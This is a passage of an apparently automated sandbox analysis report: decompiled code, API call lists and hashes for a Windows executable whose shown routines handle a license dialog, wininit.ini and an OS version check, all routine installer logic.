                                                                                                                                                                                                                                              				void* _t3;
                                                                                                                                                                                                                                              				void* _t9;
                                                                                                                                                                                                                                              				CHAR* _t16;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t16 = "LICENSE";
                                                                                                                                                                                                                                              				_t1 = E00A8468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                              				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                              				 *0xa88d4c = _t3;
                                                                                                                                                                                                                                              				if(_t3 != 0) {
                                                                                                                                                                                                                                              					_t19 = _t16;
                                                                                                                                                                                                                                              					if(E00A8468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                                                              						if(lstrcmpA( *0xa88d4c, "<None>") == 0) {
                                                                                                                                                                                                                                              							LocalFree( *0xa88d4c);
                                                                                                                                                                                                                                              							L9:
                                                                                                                                                                                                                                              							 *0xa89124 = 0;
                                                                                                                                                                                                                                              							return 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t9 = E00A86517(_t19, 0x7d1, 0, E00A83100, 0, 0);
                                                                                                                                                                                                                                              						LocalFree( *0xa88d4c);
                                                                                                                                                                                                                                              						if(_t9 != 0) {
                                                                                                                                                                                                                                              							goto L9;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *0xa89124 = 0x800704c7;
                                                                                                                                                                                                                                              						L2:
                                                                                                                                                                                                                                              						return 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					E00A844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					LocalFree( *0xa88d4c);
                                                                                                                                                                                                                                              					 *0xa89124 = 0x80070714;
                                                                                                                                                                                                                                              					goto L2;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				E00A844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              				 *0xa89124 = E00A86285();
                                                                                                                                                                                                                                              				goto L2;
                                                                                                                                                                                                                                              			}






                                                                                                                                                                                                                                              0x00a83a46
                                                                                                                                                                                                                                              0x00a83a57
                                                                                                                                                                                                                                              0x00a83a5d
                                                                                                                                                                                                                                              0x00a83a63
                                                                                                                                                                                                                                              0x00a83a6a
                                                                                                                                                                                                                                              0x00a83a91
                                                                                                                                                                                                                                              0x00a83a9a
                                                                                                                                                                                                                                              0x00a83ad8
                                                                                                                                                                                                                                              0x00a83b13
                                                                                                                                                                                                                                              0x00a83b19
                                                                                                                                                                                                                                              0x00a83b1b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83b21
                                                                                                                                                                                                                                              0x00a83ae7
                                                                                                                                                                                                                                              0x00a83af4
                                                                                                                                                                                                                                              0x00a83afc
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83afe
                                                                                                                                                                                                                                              0x00a83a87
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83a87
                                                                                                                                                                                                                                              0x00a83aa8
                                                                                                                                                                                                                                              0x00a83ab3
                                                                                                                                                                                                                                              0x00a83ab9
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83ab9
                                                                                                                                                                                                                                              0x00a83a78
                                                                                                                                                                                                                                              0x00a83a82
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846A0
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: SizeofResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846A9
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846C3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LoadResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846CC
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LockResource.KERNEL32(00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846D3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: memcpy_s.MSVCRT ref: 00A846E5
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846EF
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A82F64,?,00000002,00000000), ref: 00A83A5D
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00A83AB3
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A84518
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A84554
                                                                                                                                                                                                                                                • Part of subcall function 00A86285: GetLastError.KERNEL32(00A85BBC), ref: 00A86285
                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(<None>,00000000), ref: 00A83AD0
                                                                                                                                                                                                                                              • LocalFree.KERNEL32 ref: 00A83B13
                                                                                                                                                                                                                                                • Part of subcall function 00A86517: FindResourceA.KERNEL32(00A80000,000007D6,00000005), ref: 00A8652A
                                                                                                                                                                                                                                                • Part of subcall function 00A86517: LoadResource.KERNEL32(00A80000,00000000,?,?,00A82EE8,00000000,00A819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A86538
                                                                                                                                                                                                                                                • Part of subcall function 00A86517: DialogBoxIndirectParamA.USER32(00A80000,00000000,00000547,00A819E0,00000000), ref: 00A86557
                                                                                                                                                                                                                                                • Part of subcall function 00A86517: FreeResource.KERNEL32(00000000,?,?,00A82EE8,00000000,00A819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A86560
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00A83100,00000000,00000000), ref: 00A83AF4
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                              • String ID: <None>$LICENSE
                                                                                                                                                                                                                                              • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                              • Opcode ID: 0dffa83777e7858dcf02d210ead1e64c65e4ff2ef7cd5721a62671752266f9cd
                                                                                                                                                                                                                                              • Instruction ID: 5692b2a1adee5da926b305a339b270e181d078859d367d1e2b75a46a9420a34a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0dffa83777e7858dcf02d210ead1e64c65e4ff2ef7cd5721a62671752266f9cd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2111B471600201ABEB24FBF29D0DE2779B9EBD9F40B10453EB541DA1A0EE7E88138720
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E00A824E0(void* __ebx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t7;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				long _t26;
                                                                                                                                                                                                                                              				signed int _t27;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t20 = __ebx;
                                                                                                                                                                                                                                              				_t7 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                                                              				_t25 = 0x104;
                                                                                                                                                                                                                                              				_t26 = 0;
                                                                                                                                                                                                                                              				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                              					E00A8658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                                                              					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                                                              					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                                                              					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                              						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                                                              						_lclose(_t25);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A86CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                                                              			}











                                                                                                                                                                                                                                              0x00a824e0
                                                                                                                                                                                                                                              0x00a824eb
                                                                                                                                                                                                                                              0x00a824f2
                                                                                                                                                                                                                                              0x00a824f7
                                                                                                                                                                                                                                              0x00a82504
                                                                                                                                                                                                                                              0x00a8250e
                                                                                                                                                                                                                                              0x00a8251d
                                                                                                                                                                                                                                              0x00a8252c
                                                                                                                                                                                                                                              0x00a82541
                                                                                                                                                                                                                                              0x00a82546
                                                                                                                                                                                                                                              0x00a82553
                                                                                                                                                                                                                                              0x00a82555
                                                                                                                                                                                                                                              0x00a82555
                                                                                                                                                                                                                                              0x00a82546
                                                                                                                                                                                                                                              0x00a8256c

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00A82506
                                                                                                                                                                                                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00A8252C
                                                                                                                                                                                                                                              • _lopen.KERNEL32 ref: 00A8253B
                                                                                                                                                                                                                                              • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00A8254C
                                                                                                                                                                                                                                              • _lclose.KERNEL32(00000000), ref: 00A82555
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                              • String ID: wininit.ini
                                                                                                                                                                                                                                              • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                              • Opcode ID: 698b0d2985a8ffdbf3df849ed9bd2dc88de62d7e2aee2bf156d249e2a6b891df
                                                                                                                                                                                                                                              • Instruction ID: 3a6ea69bbb1e0677b7e8461fff8fd1058e05933f8ce3c14df890f710120d2ad0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 698b0d2985a8ffdbf3df849ed9bd2dc88de62d7e2aee2bf156d249e2a6b891df
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF017572A0011867D720EBA5DD0DEEF7B7CEB55760F000165FA49D7190DE788E46CB91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                                                                                                              			E00A836EE(CHAR* __ecx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                                                              				signed int _v420;
                                                                                                                                                                                                                                              				signed int _v424;
                                                                                                                                                                                                                                              				CHAR* _v428;
                                                                                                                                                                                                                                              				CHAR* _v432;
                                                                                                                                                                                                                                              				signed int _v436;
                                                                                                                                                                                                                                              				CHAR* _v440;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t72;
                                                                                                                                                                                                                                              				CHAR* _t77;
                                                                                                                                                                                                                                              				CHAR* _t91;
                                                                                                                                                                                                                                              				CHAR* _t94;
                                                                                                                                                                                                                                              				int _t97;
                                                                                                                                                                                                                                              				CHAR* _t98;
                                                                                                                                                                                                                                              				signed char _t99;
                                                                                                                                                                                                                                              				CHAR* _t104;
                                                                                                                                                                                                                                              				signed short _t107;
                                                                                                                                                                                                                                              				signed int _t109;
                                                                                                                                                                                                                                              				short _t113;
                                                                                                                                                                                                                                              				void* _t114;
                                                                                                                                                                                                                                              				signed char _t115;
                                                                                                                                                                                                                                              				short _t119;
                                                                                                                                                                                                                                              				CHAR* _t123;
                                                                                                                                                                                                                                              				CHAR* _t124;
                                                                                                                                                                                                                                              				CHAR* _t129;
                                                                                                                                                                                                                                              				signed int _t131;
                                                                                                                                                                                                                                              				signed int _t132;
                                                                                                                                                                                                                                              				CHAR* _t135;
                                                                                                                                                                                                                                              				CHAR* _t138;
                                                                                                                                                                                                                                              				signed int _t139;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t72 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                                                              				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                              				_t115 = __ecx;
                                                                                                                                                                                                                                              				_t135 = 0;
                                                                                                                                                                                                                                              				_v432 = __ecx;
                                                                                                                                                                                                                                              				_t138 = 0;
                                                                                                                                                                                                                                              				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                                                              					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                                                              					_t119 = 2;
                                                                                                                                                                                                                                              					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                                                              					__eflags = _t77;
                                                                                                                                                                                                                                              					if(_t77 == 0) {
                                                                                                                                                                                                                                              						_t119 = 0;
                                                                                                                                                                                                                                              						__eflags = 1;
                                                                                                                                                                                                                                              						 *0xa88184 = 1;
                                                                                                                                                                                                                                              						 *0xa88180 = 1;
                                                                                                                                                                                                                                              						L13:
                                                                                                                                                                                                                                              						 *0xa89a40 = _t119;
                                                                                                                                                                                                                                              						L14:
                                                                                                                                                                                                                                              						__eflags =  *0xa88a34 - _t138; // 0x0
                                                                                                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                                                                                                              							goto L66;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags = _t115;
                                                                                                                                                                                                                                              						if(_t115 == 0) {
                                                                                                                                                                                                                                              							goto L66;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_v428 = _t135;
                                                                                                                                                                                                                                              						__eflags = _t119;
                                                                                                                                                                                                                                              						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                                                              						_t11 =  &_v420;
                                                                                                                                                                                                                                              						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                                                              						__eflags =  *_t11;
                                                                                                                                                                                                                                              						_v440 = _t115;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_v424 = _t135 * 0x18;
                                                                                                                                                                                                                                              							_v436 = E00A82A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                                                              							_t91 = E00A82A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                                                              							_t123 = _v436;
                                                                                                                                                                                                                                              							_t133 = 0x54d;
                                                                                                                                                                                                                                              							__eflags = _t123;
                                                                                                                                                                                                                                              							if(_t123 < 0) {
                                                                                                                                                                                                                                              								L32:
                                                                                                                                                                                                                                              								__eflags = _v420 - 1;
                                                                                                                                                                                                                                              								if(_v420 == 1) {
                                                                                                                                                                                                                                              									_t138 = 0x54c;
                                                                                                                                                                                                                                              									L36:
                                                                                                                                                                                                                                              									__eflags = _t138;
                                                                                                                                                                                                                                              									if(_t138 != 0) {
                                                                                                                                                                                                                                              										L40:
                                                                                                                                                                                                                                              										__eflags = _t138 - _t133;
                                                                                                                                                                                                                                              										if(_t138 == _t133) {
                                                                                                                                                                                                                                              											L30:
                                                                                                                                                                                                                                              											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                                                              											_t115 = 0;
                                                                                                                                                                                                                                              											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                                                              											__eflags = _t138 - _t133;
                                                                                                                                                                                                                                              											_t133 = _v432;
                                                                                                                                                                                                                                              											if(__eflags != 0) {
                                                                                                                                                                                                                                              												_t124 = _v440;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                                                              												_v420 =  &_v268;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags = _t124;
                                                                                                                                                                                                                                              											if(_t124 == 0) {
                                                                                                                                                                                                                                              												_t135 = _v436;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												_t99 = _t124[0x30];
                                                                                                                                                                                                                                              												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                                                              												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                                                              												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                                                              													asm("sbb ebx, ebx");
                                                                                                                                                                                                                                              													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													_t115 = 0x104;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags =  *0xa88a38 & 0x00000001;
                                                                                                                                                                                                                                              											if(( *0xa88a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                              												L64:
                                                                                                                                                                                                                                              												_push(0);
                                                                                                                                                                                                                                              												_push(0x30);
                                                                                                                                                                                                                                              												_push(_v420);
                                                                                                                                                                                                                                              												_push("lenta");
                                                                                                                                                                                                                                              												goto L65;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												__eflags = _t135;
                                                                                                                                                                                                                                              												if(_t135 == 0) {
                                                                                                                                                                                                                                              													goto L64;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												__eflags =  *_t135;
                                                                                                                                                                                                                                              												if( *_t135 == 0) {
                                                                                                                                                                                                                                              													goto L64;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												MessageBeep(0);
                                                                                                                                                                                                                                              												_t94 = E00A8681F(_t115);
                                                                                                                                                                                                                                              												__eflags = _t94;
                                                                                                                                                                                                                                              												if(_t94 == 0) {
                                                                                                                                                                                                                                              													L57:
                                                                                                                                                                                                                                              													0x180030 = 0x30;
                                                                                                                                                                                                                                              													L58:
                                                                                                                                                                                                                                              													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
                                                                                                                                                                                                                                              													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                                                              													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                                                              														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                                                              														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                                                              															goto L66;
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              														__eflags = _t97 - 1;
                                                                                                                                                                                                                                              														L62:
                                                                                                                                                                                                                                              														if(__eflags == 0) {
                                                                                                                                                                                                                                              															_t138 = 0;
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              														goto L66;
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              													__eflags = _t97 - 6;
                                                                                                                                                                                                                                              													goto L62;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												_t98 = E00A867C9(_t124, _t124);
                                                                                                                                                                                                                                              												__eflags = _t98;
                                                                                                                                                                                                                                              												if(_t98 == 0) {
                                                                                                                                                                                                                                              													goto L57;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												goto L58;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                                                              										if(_t138 == 0x54c) {
                                                                                                                                                                                                                                              											goto L30;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										__eflags = _t138;
                                                                                                                                                                                                                                              										if(_t138 == 0) {
                                                                                                                                                                                                                                              											goto L66;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_t135 = 0;
                                                                                                                                                                                                                                              										__eflags = 0;
                                                                                                                                                                                                                                              										goto L44;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									L37:
                                                                                                                                                                                                                                              									_t129 = _v432;
                                                                                                                                                                                                                                              									__eflags = _t129[0x7c];
                                                                                                                                                                                                                                              									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                                                              										goto L66;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t133 =  &_v268;
                                                                                                                                                                                                                                              									_t104 = E00A828E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                                                              									__eflags = _t104;
                                                                                                                                                                                                                                              									if(_t104 != 0) {
                                                                                                                                                                                                                                              										goto L66;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t135 = _v428;
                                                                                                                                                                                                                                              									_t133 = 0x54d;
                                                                                                                                                                                                                                              									_t138 = 0x54d;
                                                                                                                                                                                                                                              									goto L40;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								goto L33;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags = _t91;
                                                                                                                                                                                                                                              							if(_t91 > 0) {
                                                                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags = _t123;
                                                                                                                                                                                                                                              							if(_t123 != 0) {
                                                                                                                                                                                                                                              								__eflags = _t91;
                                                                                                                                                                                                                                              								if(_t91 != 0) {
                                                                                                                                                                                                                                              									goto L37;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                                                              								L27:
                                                                                                                                                                                                                                              								if(__eflags <= 0) {
                                                                                                                                                                                                                                              									goto L37;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								L28:
                                                                                                                                                                                                                                              								__eflags = _t135;
                                                                                                                                                                                                                                              								if(_t135 == 0) {
                                                                                                                                                                                                                                              									goto L33;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t138 = 0x54c;
                                                                                                                                                                                                                                              								goto L30;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags = _t91;
                                                                                                                                                                                                                                              							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                                                              							if(_t91 != 0) {
                                                                                                                                                                                                                                              								_t131 = _v424;
                                                                                                                                                                                                                                              								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                                                              								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                                                              									goto L37;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								goto L28;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                                                              							_t109 = _v424;
                                                                                                                                                                                                                                              							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                                                              							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                                                              								goto L28;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                                                              							goto L27;
                                                                                                                                                                                                                                              							L33:
                                                                                                                                                                                                                                              							_t135 =  &(_t135[1]);
                                                                                                                                                                                                                                              							_v428 = _t135;
                                                                                                                                                                                                                                              							_v420 = _t135;
                                                                                                                                                                                                                                              							__eflags = _t135 - 2;
                                                                                                                                                                                                                                              						} while (_t135 < 2);
                                                                                                                                                                                                                                              						goto L36;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__eflags = _t77 == 1;
                                                                                                                                                                                                                                              					if(_t77 == 1) {
                                                                                                                                                                                                                                              						 *0xa89a40 = _t119;
                                                                                                                                                                                                                                              						 *0xa88184 = 1;
                                                                                                                                                                                                                                              						 *0xa88180 = 1;
                                                                                                                                                                                                                                              						__eflags = _t133 - 3;
                                                                                                                                                                                                                                              						if(_t133 > 3) {
                                                                                                                                                                                                                                              							__eflags = _t133 - 5;
                                                                                                                                                                                                                                              							if(_t133 < 5) {
                                                                                                                                                                                                                                              								goto L14;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t113 = 3;
                                                                                                                                                                                                                                              							_t119 = _t113;
                                                                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t119 = 1;
                                                                                                                                                                                                                                              						_t114 = 3;
                                                                                                                                                                                                                                              						 *0xa89a40 = 1;
                                                                                                                                                                                                                                              						__eflags = _t133 - _t114;
                                                                                                                                                                                                                                              						if(__eflags < 0) {
                                                                                                                                                                                                                                              							L9:
                                                                                                                                                                                                                                              							 *0xa88184 = _t135;
                                                                                                                                                                                                                                              							 *0xa88180 = _t135;
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                                                              						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t138 = 0x4ca;
                                                                                                                                                                                                                                              					goto L44;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t138 = 0x4b4;
                                                                                                                                                                                                                                              					L44:
                                                                                                                                                                                                                                              					_push(_t135);
                                                                                                                                                                                                                                              					_push(0x10);
                                                                                                                                                                                                                                              					_push(_t135);
                                                                                                                                                                                                                                              					_push(_t135);
                                                                                                                                                                                                                                              					L65:
                                                                                                                                                                                                                                              					_t133 = _t138;
                                                                                                                                                                                                                                              					E00A844B9(0, _t138);
                                                                                                                                                                                                                                              					L66:
                                                                                                                                                                                                                                              					return E00A86CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}





































                                                                                                                                                                                                                                              0x00a836f9
                                                                                                                                                                                                                                              0x00a83700
                                                                                                                                                                                                                                              0x00a8370c
                                                                                                                                                                                                                                              0x00a83716
                                                                                                                                                                                                                                              0x00a83718
                                                                                                                                                                                                                                              0x00a8371b
                                                                                                                                                                                                                                              0x00a83721
                                                                                                                                                                                                                                              0x00a8372b
                                                                                                                                                                                                                                              0x00a8373d
                                                                                                                                                                                                                                              0x00a83745
                                                                                                                                                                                                                                              0x00a83746
                                                                                                                                                                                                                                              0x00a83746
                                                                                                                                                                                                                                              0x00a83749
                                                                                                                                                                                                                                              0x00a837ab
                                                                                                                                                                                                                                              0x00a837ad
                                                                                                                                                                                                                                              0x00a837ae
                                                                                                                                                                                                                                              0x00a837b3
                                                                                                                                                                                                                                              0x00a837b8
                                                                                                                                                                                                                                              0x00a837b8
                                                                                                                                                                                                                                              0x00a837bf
                                                                                                                                                                                                                                              0x00a837bf
                                                                                                                                                                                                                                              0x00a837c5
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
